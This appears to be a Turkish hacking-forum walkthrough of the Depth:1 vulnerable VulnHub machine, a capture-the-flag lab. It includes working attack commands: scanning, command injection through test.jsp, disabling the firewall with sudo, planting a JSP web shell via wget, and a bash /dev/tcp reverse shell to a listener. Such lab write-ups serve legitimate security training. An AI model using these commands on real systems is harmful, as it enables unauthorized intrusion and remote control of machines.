Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm



Depth:1 Açıklı Makine Çözümü / ch_arli41

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 18-02-2019 23:43   #1
  • Eğitmen
  • Üye Bilgileri
Üyelik tarihi
07/2009
Mesajlar
Konular

Teşekkür (Etti): 530
Teşekkür (Aldı): 386


Depth:1 Açıklı Makine Çözümü / ch_arli41



Bu konumda sizlere Depth 1 açıklı makine’nin çözümünü anlatacam.Bu makinemizde hedefimiz root flag (bayrak) olacaktir.Sistemde birtane flag (bayrak) var onu bulmamız isteniyor.



Depth:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:


https://www.vulnhub.com/entry/depth-1,213/







netdiscover komutu bize modeme bağlı cihazları listeliyor. Oradan ip’yi kopyalıyoruz.






Kod:
nmap ipadresi

Bu komut ile portlara bakıyoruz. 8080 portunu gösteriyor bize tarayıcımıza ipadresi ve port numarası olarak yazıyoruz.






Karşımıza web sayfası çıktı. Web sayfasında lokal dosya yolunu vermektedir orayı not alıyoruz.








Kod:
nikto -h http: ipadresi: port

Nikto ile hedef sistemdeki açıklara bakıyoruz. Çıkan sonuçtan test.jsp uzantısını not alıyoruz.







ipadresiort/test.jsp olacak şekilde tarayıcımıza yazıyoruz.Açılan sayfadaki örnek komutu yazdığımda /tmp dizinindeki dosyalarını ekrana yansıttı.








Araştırmaya devam ettiğimde bill kullanıcısına ulaştım. Bill kullanıcısının bir ssh dizinine ve sudo_as_admin_successfull adlı bir dosyaya sahip olduğunu görüyorum, portları tararken 22 ssh portunu bulamadım.Bu demek oluyor ki güvenlik duvarı aktif durumda onu kapatmamız gerekli.









Kod:
sudo ssh bill@localhost ufw disable

Bu komut ile güvenlik duvarını kapatıyoruz.







Kod:
ls -all /var/lib/tomcat8/webapps/ROOT/

Bu kısıma birazdan shelimizi yükleyeceğiz.










Kod:
python -m SimpleHTTPServer
Kod:
sh -c $@| sh . echo ssh bill@localhost sudo wget http://localhost:8000/shell.jsp -o /var/lib/tomcat8/webapps/ROOT/shell.jsp


Yukardaki komutları yazıp jsp shell’i yüklüyoruz.







Kod:
nc -lvp 2222
Kod:
ssh bill@localhost sudo bash -i>& /dev/tcp/ipadresi/2222 0>&1

Yukardaki komutları yazıyoruz ve shelimize bağlanıyoruz.








Kod:
cat /root/flag


Bayrağı bulduk bir konun daha sonuna geldik.Hata alan olur ise resimli olarak hatayı iletirse yardımcı olurum.



___________________________________________


Konu ch_arli41 tarafından (21-02-2019 23:44 Saat 23:44 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

"Aqu3LReX, Ceys, "Tranquila, teguardian Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau